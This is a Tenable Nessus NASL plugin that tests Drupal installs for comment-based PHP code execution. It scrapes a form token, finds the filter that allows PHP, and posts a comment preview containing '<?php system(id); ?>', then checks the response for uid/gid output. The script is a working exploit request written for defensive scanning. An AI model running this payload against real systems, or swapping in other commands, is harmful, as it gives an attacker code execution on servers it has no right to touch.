#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server contains a PHP application that allows execution
of arbitrary code. 

Description :

The version of Drupal installed on the remote host is configured to
support arbitrary PHP code in comments.  An attacker can leverage this
issue to preview a comment and have it interpreted as PHP code, which
will result in it being executed on the affected host with the
privileges of the web server user id. 

Solution :

Review the configuration of input filters, especially those available
to anonymous users. 

Risk factor : 

Medium / CVSS Base Score : 5.1
(CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(24265);
  script_version("$Revision: 1.3 $");

  script_name(english:"Drupal Comment Code Execution Vulnerability");
  script_summary(english:"Tries to execute a command via Drupal");
 
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security");

  script_dependencies("drupal_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/drupal"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # First we need a posting id.
  res = http_get_cache(item:string(dir, "/index.php"), port:port);
  if (res == NULL) exit(0);

  pat = string('<a href="(', dir, '/\\?q=|', dir, '/)?comment/reply/([0-9]+)');
  matches = egrep(pattern:pat, string:res);
  pid = NULL;
  if (matches) 
  {
    foreach match (split(matches)) 
    {
      match = chomp(match);
      subpats = eregmatch(pattern:pat, string:match);
      if (!isnull(subpats))
      {
        pid = subpats[2];
        break;
      }
    }
  }

  # If we have one...
  if (!isnull(pid))
  {
    # Pull up the form.
    url = string(dir, "/?q=comment/reply/", pid, "#comment_form");
    req = http_get(item:url, port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # Grab the form token.
    pat = 'name="edit[form_token]"[^>]* value="([^"]+)"';
    matches = egrep(pattern:pat, string:res);
    token = NULL;
    if (matches) 
    {
      foreach match (split(matches)) 
      {
        match = chomp(match);
        subpats = eregmatch(pattern:pat, string:match);
        if (!isnull(subpats))
        {
          token = subpats[1];
          break;
        }
      }
    }
    if (isnull(token)) token = "e7a9fc015e16fc6d493bf1692b7c28e8";

    # Make sure the PHP input filter is allowed
    if (
      ' name="edit[format]" value="' >< res &&
      "You may post PHP code." >< res
    )
    {
      # Figure out which input filter allows PHP code.
      filter = NULL;
      filter_name = NULL;
      j = 0;
      while (j >= 0)
      {
        i = stridx(res, 'name="edit[format]"', j);
        if (i >= 0) j = stridx(res, "</div>", i);
        else j = -1;

        if (j > 0)
        {
          item = substr(res, i, j);
          if ("You may post PHP code." >< item)
          {
            pat = 'name="edit\\[format\\]" value="([0-9]+)"';
            matches = egrep(pattern:pat, string:item);
            if (matches) 
            {
              foreach match (split(matches)) 
              {
                match = chomp(match);
                subpats = eregmatch(pattern:pat, string:match);
                if (!isnull(subpats))
                {
                  filter = subpats[1];
                  break;
                }
              }
            }

            pat = '> ([^<]+)</label>';
            matches = egrep(pattern:pat, string:item);
            if (matches) 
            {
              foreach match (split(matches)) 
              {
                match = chomp(match);
                subpats = eregmatch(pattern:pat, string:match);
                if (!isnull(subpats))
                {
                  filter_name = subpats[1];
                  break;
                }
              }
            }

            j = -1;
          }
        }
      }

      if (!isnull(filter))
      {
        # Try to run a command.
        cmd = "id";
        postdata = string(
          "edit[subject]=Nessus&",
          "edit[comment]=", urlencode(str:string("<?php system(", cmd, "); ?>")), "&",
          "edit[format]=", filter, "&",
          "edit[form_token]=", token, "&",
          "edit[form_id]=comment_form&",
          "op=Preview+comment"
        );
        req = string(
          "POST ", url, " HTTP/1.1\r\n",
          "Host: ", get_host_name(), "\r\n",
          "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
          "Content-Type: application/x-www-form-urlencoded\r\n",
          "Content-Length: ", strlen(postdata), "\r\n",
          "\r\n",
          postdata
        );
        res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
        if (res == NULL) exit(0);

       # There's a problem if we see the code in the output.
        line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
        if (line)
        {
          if ('class="content">' >< line) line = strstr(line, "uid=");
          if ("</div" >< line) line = line - "</div>";

          report = string(
            desc,
            "\n\n",
            "Plugin output :\n",
            "\n",
            "Nessus was able to execute the command '", cmd, "' on the remote host\n",
            "using the '", filter_name, "' input filter. It produced the following\n",
            "output :\n",
            "\n",
            "  ", line
          );
          security_warning(port:port, data:report);
          exit(0);
        }
      }
    }
  }
}
